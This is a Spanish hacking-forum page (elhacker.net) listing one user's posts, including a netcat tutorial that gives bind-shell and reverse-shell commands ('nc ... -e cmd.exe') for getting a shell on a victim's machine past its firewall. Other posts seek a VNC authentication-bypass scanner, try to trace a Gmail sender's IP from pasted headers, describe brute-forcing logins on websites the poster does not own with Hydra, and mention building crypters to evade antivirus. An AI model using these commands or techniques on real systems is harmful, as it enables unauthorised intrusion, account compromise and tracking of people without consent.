elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: [1] 2 3
1  Seguridad Informática / Hacking / Re: Conseguir Shell con Netcat en: 11 Enero 2010, 01:57 am
A resumidas cuentas, es algo basico que no etsa de más tener entre manos durante una intrusión.

Saludos

si tienes que tener esto a mano para realizar una intrusion, sera mejor qeu te replatees el hacer el ataque  ;)



Estas diciendo que nc no es útil a la hora de una intrusión  :silbar:
2  Seguridad Informática / Hacking / Re: Conseguir Shell con Netcat en: 10 Enero 2010, 18:16 pm
Motivais como nadie para que la gente aporte  ;)
3  Seguridad Informática / Hacking / Re: Conseguir Shell con Netcat en: 10 Enero 2010, 16:57 pm
Puede que no lo haya copiado y que verdaderamente lo hizo él, solo que se han visto demaciados tutoriales hablando de estó, donde toda la info es casi la misma. Asi que no te sulfures que esta diciendo la verdad... Pero buen aporté... :·P


  • Lo de la IP es la IP de "mi" ordenador, y si una vez que la victima acciona el script claro que me conecto a su IP local sino como quieres que me conecte a su ordenador?
Con la IP Publica... :·P

creo que en la inversa se puede hacer un No-IP también pero preferí poner la IP
Re-WTF! No-IP!

... esto ... gracias! xD ya modifique un poco el post, gracias la verdad es que mas salvado xD

Saludos!
4  Seguridad Informática / Hacking / Re: [Urgente] VNC bypass & IP Gmail en: 10 Enero 2010, 16:56 pm
Lo siento, pero los links que me has dado no me funcionan  :-\, aver si los pusiste mal o algo asi

Por cierto, uso Windows XP y no, no tengo WMware para tener Backtrack

Saludos!
5  Seguridad Informática / Hacking / Re: Conseguir Shell con Netcat en: 10 Enero 2010, 16:38 pm
Está muy bien , pero este tutorial es la copia , de la copia de otra copia de algún tutorial sobre netcat :).
Al margen del tutorial de GNUtizien de netcat casi todos los tutoriales son iguales o plagiados.
[EDITO]: Y "192.168.1.33" no tiene por qué necesariamente ser nuestra ip local , con lo que aquí si que se que es una copia , no?

DIOS! que dices loco pero si lo hice yo sin copiar nada aver vamos por puntos:

  • Lo de la IP es la IP de "mi" ordenador, y si una vez que la victima acciona el script claro que me conecto a su IP local sino como quieres que me conecte a su ordenador? EDITO: Con la pública u.u
  • No digas que lo he copiado sin tener ni idea  ;), ¿la pregunta que era a pillar?

Saludos!
6  Seguridad Informática / Hacking / [Urgente] VNC bypass & IP Gmail en: 10 Enero 2010, 16:30 pm
Hola, quería saber si alguien tiene ese programa, para ver si un rango de IP's es vulnerable con VNC (Ej.:4.1)

Busco el programa del siguiente vídeo

http://www.youtube.com/watch?v=4JNkq21pxwI

Aver si me lo podeis pasar  :D

Mi otra duda es que yo uso el cliente de correo Hotmail, y una persona que conozco usa Gmail el caso es que me envió una serie de emails con archivos adjuntos y me gustaría saber su IP, le di a ver el código fuente para ver si salía la IP de la persona que lo envió pero creo que me sale una que no creo que sea   :rolleyes:

Os pongo lo que me salió cuando le di a Código Fuente, para ver si me podéis ayudar  :P

Citar
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0xO0Q9MTtTQ0w9MA==

X-Message-Status: n:0

X-SID-PRA: Amigo <Correo_Gmail@gmail.com>

X-SID-Result: Pass

X-Message-Info: JGTYoYF78jG9ZXbx0t2orl7gktoGw8q8/wJV5TYJJbahTX/c58YRiItpTE72Q8og5jJ8redmsLkK0doKNyJWwfcugsd0XGry

Received: from mail-fx0-f227.google.com ([209.85.220.227]) by SNT0-MC1-F4.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959);

    Wed, Fecha 04:53:14 -0800

Received: by mail-fx0-f227.google.com with SMTP id 27so7473918fxm.3

        for <rubenmolga1@hotmail.com>; Wed, 23 Dec 2009 04:53:14 -0800 (PST)

DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;

        d=gmail.com; s=gamma;

        h=domainkey-signature:mime-version:received:in-reply-to:references

         :from:date:message-id:subject:content-type;

        bh=lFbYX9h5+qjA8u6NIEZ1u7XCiIzl5cpg2tB8bLtyGvg=;

        b=vidPYawi9DU/VQT4QUOlQA3MrIpjqo1zpIpl1DxrjZec0C1NYws/lYRCEq45DUz3gM

         WtRVvvHcEMsu54nPnHJYwKsiA3ULhmWTUnhvjg3NYcZyc2TaEf7B+R0DGEQpCw8DkPIQ

         WS70F/QB88FL7T3OI3d6ReqEuvBoY5V7LKqlI=

DomainKey-Signature: a=rsa-sha1; c=nofws;

        d=gmail.com; s=gamma;

        h=mime-version:in-reply-to:references:from:date:message-id:subject

         :content-type;

        b=QvzwaYzQhiTNdeK6E9IosGGPS7e1ksdTOoScZ2rjPeawVLqEL1O712AsPjb+/Nex76

         ONouQytCmI+Gzwb1v+CtiIwrne7QKVvIL64CuOtzEJuM/OdfC+9uWisZ35IBN5yhpf8a

         ApLM27nq43yk2stG/jOC0FELkkTixlSWpMCkw=

MIME-Version: 1.0

Received: by 10.103.127.29 with SMTP id e29mt4653043mun.79.1261572791944; Wed,

   Fecha -0800 (PST)

In-Reply-To: <43419f320912230441u797eb0e5m3e1096da3ea9bbed@mail.gmail.com>

References: <SNT133-w40649E652A42868435FC4596800@phx.gbl> <43419f320912230441u797eb0e5m3e1096da3ea9bbed@mail.gmail.com>

From: Amigo <Cuenta_Gmail@gmail.com>

Date: Fecha 13:52:51 +0100

Message-ID: <43419f320912230452j188ecffs7f51dc65ef28e8e9@mail.gmail.com>

Subject:

Content-Type: multipart/mixed; boundary=0016e65a10183897d7047b64cec4

Bcc:

Return-Path: cuenta_Gmail@gmail.com

X-OriginalArrivalTime: 23 Dec 2009 12:53:14.0638 (UTC) FILETIME=[E41232E0:01CA83CE]



--0016e65a10183897d7047b64cec4

Content-Type: multipart/alternative; boundary=0016e65a10183897cc047b64cec2



--0016e65a10183897cc047b64cec2

Content-Type: text/plain; charset=ISO-8859-1

Content-Transfer-Encoding: quoted-printable



"Más mensaje"



"Mensje"=

=E1

Mensaje



--0016e65a10183897cc047b64cec2

Content-Type: text/html; charset=ISO-8859-1

Content-Transfer-Encoding: quoted-printable



<div>"Mensaje enviado"! </=

div>

<div>=A0</div>

<div>Más mensaje =

ser=Más mensaje!</div>



--0016e65a10183897cc047b64cec2--

--0016e65a10183897d7047b64cec4

Content-Type: image/jpeg; name="imagen.jpg"

Content-Disposition: attachment; filename="imagen.JPG"

Content-Transfer-Encoding: base64

X-Attachment-Id: f_g3k3envq0



/9j/4V/SRXhpZgAATU0AKgAAAAgACwEPAAIAAAAYAAAAkgEQAAIAAAAIAAAAqgESAAMAAAABAAEA

AAEaAAUAAAABAAAAsgEbAAUAAAABAAAAugEoAAMAAAABAAIAAAExAAIAAAAWAAAAwgEyAAIAAAAU

Sigue con esa secuencia de letras

Obviamente quite los datos personales de mi amigo como Cuenta de Correo, Nombre y apellidos, y también la fecha del envio

Aver si me podeis ayudar  :)

Saludos!

7  Seguridad Informática / Hacking / Conseguir Shell con Netcat en: 10 Enero 2010, 15:25 pm
Conseguir Shell en Netcat

Autor: Pyr0s
Foro: Evolution

Hay dos maneras de conseguir shell por conexión directa o inversa, mostraré las dos pero os aconsejo que useis la inversa ya que os saltais unos cuantos firewalls  

Conexión Directa

En este tipo de conexión tú te conectas a la victima, el funcionamiento sería el siguiente:


Citar
nc -l -p 123 -e cmd.exe

-l:Activa el modo escucha de nc
-P: Permite a nc elegir el puerto
-e: Permite ejecutar un comando, en nuestro caso cmd.exe (Shell)


Ese sería el comando que tendría que ejecutar la víctima


Citar
Telnet 192.168.1.33 123

Y ahi es donde nosotros nos tendríamos que conectar, entonces ya tendriamos Shell  

Inversa


Citar
nc -v -l -p 123

-v: Informa del estado de Netcat
-l:Activa el modo escucha de nc
-P: Permite a nc elegir el puerto


Esos serían los comandos que tenemos que teclear, mientras que nuestra víctima tiene que ejcutar los siguientes comandos


Citar
nc 192.168.1.33 123 -e cmd.exe

Con lo que la Shell la consigue el usuario que esta en escucha en este caso nosotros, y asi tenemos shell y evitamos que no salte el firewall de nuestra victima  

Esto es todo, espero que os haya gustado el tutorial    :P

Saludos!
8  Seguridad Informática / Seguridad / Re: Nueva encuesta: Mejor Antivirus en: 10 Diciembre 2009, 22:35 pm
Croe que Bitdefender ha sido elegido como mejor AV de 2009, pero me han dicho que la Heurística del Avira es muy buena, y es sin duda de los que más cuestan quitar cuando intentas hacer un crypter, por lo menos es lo que he visto

Saludos!
9  Seguridad Informática / Hacking / Re: Problema con Hydra en: 10 Diciembre 2009, 18:32 pm
Jajaja no te preocupes por eso, lo hago con webs que se que no van a buscarme y que solo quiero ver si se pueden penetrar. Si, ese mensaje me salio, ya que me parece que habia como 3.567.935 de posibilididades xD pero me cambie a Hydra y la verdad es que si se hace por HTTP (Creo que tan solo se congela durante 15min en VBulletin) si sabes el User y metes el diccionario de Password, puede tardarte 1 hora o dos (relativamente poco) Pero no puedo usar ni Brutus y THC Hydra  :-\.

De todos modos también he visto que se puede usar THC Hydra para crackear contraseñas del Router, se puede hacer lo mismo con WPA o claves WEP?

Desde ya gracias  ;)

Saludos!
10  Seguridad Informática / Hacking / Re: Problema con Hydra en: 9 Diciembre 2009, 18:25 pm
Pero probe en otras webs y me paso lo mismo  :huh: me sale lo mismo, y cuando doy a otro como Telnet me sale lo mismo  :rolleyes:

Saludos!
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines